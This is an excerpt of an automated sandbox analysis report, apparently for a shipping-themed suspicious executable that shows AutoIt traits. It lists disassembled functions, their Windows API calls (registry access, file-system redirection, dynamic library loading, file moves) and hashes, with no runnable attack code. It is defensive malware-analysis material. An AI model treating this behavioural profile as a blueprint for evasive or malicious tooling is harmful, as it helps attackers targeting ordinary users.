                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Menu$Item$DrawInfoInsert
                                                                                            • String ID: 0
                                                                                            • API String ID: 3076010158-4108050209
                                                                                            • Opcode ID: 7e24f3124adb3013733216f5866f1e326096ddbd97ef5a5ccf768261af2a3c8a
                                                                                            • Instruction ID: 0c4747cff6b06d4bb70f25580ed1e2067a4f494d44723cb0762a8ab669449af4
                                                                                            • Opcode Fuzzy Hash: 7e24f3124adb3013733216f5866f1e326096ddbd97ef5a5ccf768261af2a3c8a
                                                                                            • Instruction Fuzzy Hash: 5C411275A01209EFDB20DF64D884AEABBB9FF49354F04412AE905AB750D730EE44CBA0
                                                                                            Function 00881DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 00883CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00883CCA
                                                                                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00881E66
                                                                                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00881E79
                                                                                            • SendMessageW.USER32(?,00000189,?,00000000), ref: 00881EA9
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$_wcslen$ClassName
                                                                                            • String ID: ComboBox$ListBox
                                                                                            • API String ID: 2081771294-1403004172
                                                                                            • Opcode ID: 91a166b0f60bb0462a09fa7ecd6c1a47ebce36fd3de0a262174c47460aab8f4e
                                                                                            • Instruction ID: b923767e4dc4b9866d1989a722571c8ab2270e6633a7fedfacaf1fae144e57fa
                                                                                            • Opcode Fuzzy Hash: 91a166b0f60bb0462a09fa7ecd6c1a47ebce36fd3de0a262174c47460aab8f4e
                                                                                            • Instruction Fuzzy Hash: C421E471A00108ABDB14AB68EC49CFFB7ADFF56364B144129F825E72E1DB7449468720
                                                                                            Function 008B2F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 008B2F8D
                                                                                            • LoadLibraryW.KERNEL32(?), ref: 008B2F94
                                                                                            • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 008B2FA9
                                                                                            • DestroyWindow.USER32(?), ref: 008B2FB1
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                            • String ID: SysAnimate32
                                                                                            • API String ID: 3529120543-1011021900
                                                                                            • Opcode ID: cee7518ad3997fc7ead7081c87ca554b09a310851fb3de4dcfd9252846f015fd
                                                                                            • Instruction ID: 66cf679f4554ecb5ffa9b38953055e9d2fa1b377b8c6761ffa55b42727eb1a0b
                                                                                            • Opcode Fuzzy Hash: cee7518ad3997fc7ead7081c87ca554b09a310851fb3de4dcfd9252846f015fd
                                                                                            • Instruction Fuzzy Hash: F4218C71214209ABEF205F64DC84EFB77B9FB59364F104628F950D6390DB71DC919760
                                                                                            Function 00844D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00844D1E,008528E9,?,00844CBE,008528E9,008E88B8,0000000C,00844E15,008528E9,00000002), ref: 00844D8D
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00844DA0
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00844D1E,008528E9,?,00844CBE,008528E9,008E88B8,0000000C,00844E15,008528E9,00000002,00000000), ref: 00844DC3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: d2e37efcd2959def67e4a404c899bf4ddc21380f12510dd7d169e14002ae1179
                                                                                            • Instruction ID: 16ba808345e2b026fbbcc3ff8cb0fa9611cd5a3cc50713f0224b85f209e01df6
                                                                                            • Opcode Fuzzy Hash: d2e37efcd2959def67e4a404c899bf4ddc21380f12510dd7d169e14002ae1179
                                                                                            • Instruction Fuzzy Hash: 44F04935A4021CFBDB159F94DC49BAEBBB9FF44752F0001A8F90AE2260CB759A44DE91
                                                                                            Function 0087D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32 ref: 0087D3AD
                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0087D3BF
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0087D3E5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                            • String ID: GetSystemWow64DirectoryW$X64
                                                                                            • API String ID: 145871493-2590602151
                                                                                            • Opcode ID: 8bf23a61de33eda616b5953dc36c4d9b482dc7977c7208d5f34d718eecb07786
                                                                                            • Instruction ID: d1498792d1bc33bef72434598a940278fbacf075252e1770b5c1f32b1c0778fb
                                                                                            • Opcode Fuzzy Hash: 8bf23a61de33eda616b5953dc36c4d9b482dc7977c7208d5f34d718eecb07786
                                                                                            • Instruction Fuzzy Hash: 3FF05531801B248BC77057148C5896E7334FF21B05F55C254FA0EF636EEB60DC4686D2
                                                                                            Function 00824E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00824EDD,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E9C
                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00824EAE
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00824EDD,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824EC0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                            • API String ID: 145871493-3689287502
                                                                                            • Opcode ID: 8b8c062ce5670ab6e550b0defb20f9f35353110698825672767725ec3d893c3a
                                                                                            • Instruction ID: 397285f2be94e52c3d7f64a0fb161be155f0e910b48e361d9c42a0d9a9736ca8
                                                                                            • Opcode Fuzzy Hash: 8b8c062ce5670ab6e550b0defb20f9f35353110698825672767725ec3d893c3a
                                                                                            • Instruction Fuzzy Hash: 58E08639A016325BA2311B29BC18A5F7658FF81F727060215FC10E2300DBA4CD4240B0
                                                                                            Function 00824E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00863CDE,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E62
                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00824E74
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00863CDE,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E87
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                            • API String ID: 145871493-1355242751
                                                                                            • Opcode ID: 5e24a078feaa7a1b9025964266ddc51f73bd1138c436d6d7243d1675dbd04a12
                                                                                            • Instruction ID: 5eb56b319fb2637dcc527cde878c5dc768dc815edbb32ef02f9397cda878414b
                                                                                            • Opcode Fuzzy Hash: 5e24a078feaa7a1b9025964266ddc51f73bd1138c436d6d7243d1675dbd04a12
                                                                                            • Instruction Fuzzy Hash: E9D01239502632576A221B297C1CD8F7B18FF85B713460615F915F6224CF64CD4285F0
                                                                                            Function 008AA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 008AA427
                                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008AA435
                                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008AA468
                                                                                            • CloseHandle.KERNEL32(?), ref: 008AA63D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                            • String ID:
                                                                                            • API String ID: 3488606520-0
                                                                                            • Opcode ID: 314320a4471ea8d7571573bc8079009ea88033ccd8bd7384f7f8704fbdec63e2
                                                                                            • Instruction ID: cd8e5de334048449d0dd3a4f8c1330061d3f9924ef554ee72d65ae551a2f97a2
                                                                                            • Opcode Fuzzy Hash: 314320a4471ea8d7571573bc8079009ea88033ccd8bd7384f7f8704fbdec63e2
                                                                                            • Instruction Fuzzy Hash: 9FA17C716043009FE724DF28D886B2AB7E5FB88714F14881DF55ADB692DBB0EC41CB92
                                                                                            Function 0085BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,008C3700), ref: 0085BB91
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,008F121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0085BC09
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,008F1270,000000FF,?,0000003F,00000000,?), ref: 0085BC36
                                                                                            • _free.LIBCMT ref: 0085BB7F
                                                                                              • Part of subcall function 008529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000), ref: 008529DE
                                                                                              • Part of subcall function 008529C8: GetLastError.KERNEL32(00000000,?,0085D7D1,00000000,00000000,00000000,00000000,?,0085D7F8,00000000,00000007,00000000,?,0085DBF5,00000000,00000000), ref: 008529F0
                                                                                            • _free.LIBCMT ref: 0085BD4B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                            • String ID:
                                                                                            • API String ID: 1286116820-0
                                                                                            • Opcode ID: 9b1cb538e450f263edafb964faee35be8aae5feb6df0cace06c9f9a446437d9d
                                                                                            • Instruction ID: f5c42dc3c16121aae2107dbdd85d853d11f76c51281b0da2d5630aaac5b173a0
                                                                                            • Opcode Fuzzy Hash: 9b1cb538e450f263edafb964faee35be8aae5feb6df0cace06c9f9a446437d9d
                                                                                            • Instruction Fuzzy Hash: 93510971900209EFCB10DFB99C85DBEB7B8FF51362B10026AE950E7291EB709D49CB51
                                                                                            Function 0088E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0088DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0088CF22,?), ref: 0088DDFD
                                                                                              • Part of subcall function 0088DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0088CF22,?), ref: 0088DE16
                                                                                              • Part of subcall function 0088E199: GetFileAttributesW.KERNEL32(?,0088CF95), ref: 0088E19A
                                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 0088E473
                                                                                            • MoveFileW.KERNEL32(?,?), ref: 0088E4AC
                                                                                            • _wcslen.LIBCMT ref: 0088E5EB
                                                                                            • _wcslen.LIBCMT ref: 0088E603
                                                                                            • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0088E650
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                            • String ID:
                                                                                            • API String ID: 3183298772-0
                                                                                            • Opcode ID: 060d70ac2dfab1f86d143cfe4f0f667c5753c4b0b82c6980f3ece26fdd790d14
                                                                                            • Instruction ID: 549350bd5d2bb0c02802f1002ea2551504f0e39fe75946cf236073528f7b6444
                                                                                            • Opcode Fuzzy Hash: 060d70ac2dfab1f86d143cfe4f0f667c5753c4b0b82c6980f3ece26fdd790d14
                                                                                            • Instruction Fuzzy Hash: 1D512EB24087455BC724EBA4D8819DFB7ECFF94340F00492EE589D3191EF74A688876B
                                                                                            Function 008AB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00829CB3: _wcslen.LIBCMT ref: 00829CBD
                                                                                              • Part of subcall function 008AC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,008AB6AE,?,?), ref: 008AC9B5
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008AC9F1
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA68
                                                                                              • Part of subcall function 008AC998: _wcslen.LIBCMT ref: 008ACA9E
                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008ABAA5
                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 008ABB00
                                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 008ABB63
                                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 008ABBA6
                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 008ABBB3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                            • String ID:
                                                                                            • API String ID: 826366716-0
                                                                                            • Opcode ID: 336185b373edc91950499ffc2a404b4b1a9c7f207f45f41c2554d80d9dea180c
                                                                                            • Instruction ID: 7d270c499ad617a25aae72b14057f6a4ec6c0aa20bc3ef361e66fbc216eb71cb
                                                                                            • Opcode Fuzzy Hash: 336185b373edc91950499ffc2a404b4b1a9c7f207f45f41c2554d80d9dea180c
                                                                                            • Instruction Fuzzy Hash: 8061A031208245EFD314DF24C490E2ABBE5FF85318F54856CF4998B6A2DB31ED46CBA2
                                                                                            Function 00888BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(?), ref: 00888BCD
                                                                                            • VariantClear.OLEAUT32 ref: 00888C3E
                                                                                            • VariantClear.OLEAUT32 ref: 00888C9D
                                                                                            • VariantClear.OLEAUT32(?), ref: 00888D10
                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00888D3B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$Clear$ChangeInitType
                                                                                            • String ID:
                                                                                            • API String ID: 4136290138-0
                                                                                            • Opcode ID: 89abc530be6b1e4b07761088793ed891c362a499ee95bf8994c39e34ddc7fafe
                                                                                            • Instruction ID: ece6abb752760c21f44c72fa94b2e9a26f1e849b4f80bb5ab07c465259b37425
                                                                                            • Opcode Fuzzy Hash: 89abc530be6b1e4b07761088793ed891c362a499ee95bf8994c39e34ddc7fafe
                                                                                            • Instruction Fuzzy Hash: 735179B5A00219EFCB10DF68C894AAABBF9FF89314B158559F909DB354E730E911CF90
                                                                                            Function 00898AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00898BAE
                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00898BDA
                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00898C32
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00898C57
                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00898C5F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                            • String ID:
                                                                                            • API String ID: 2832842796-0
                                                                                            • Opcode ID: 1a823c62acae3d05c1cb20ab903e8dd34ddb9dd5e7fbbc37852df5d76e17519a
                                                                                            • Instruction ID: dd3512891b36f28875721f527cced3719384b0106add3a92bff4c01f276db436
                                                                                            • Opcode Fuzzy Hash: 1a823c62acae3d05c1cb20ab903e8dd34ddb9dd5e7fbbc37852df5d76e17519a
                                                                                            • Instruction Fuzzy Hash: 6E513835A00219DFCB05EF69C881A69BBF5FF49314F088458E849AB362DB35ED51CB91
                                                                                            Function 008A8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 008A8F40
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 008A8FD0
                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 008A8FEC
                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 008A9032
                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 008A9052
                                                                                              • Part of subcall function 0083F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00891043,?,7529E610), ref: 0083F6E6
                                                                                              • Part of subcall function 0083F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0087FA64,00000000,00000000,?,?,00891043,?,7529E610,?,0087FA64), ref: 0083F70D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
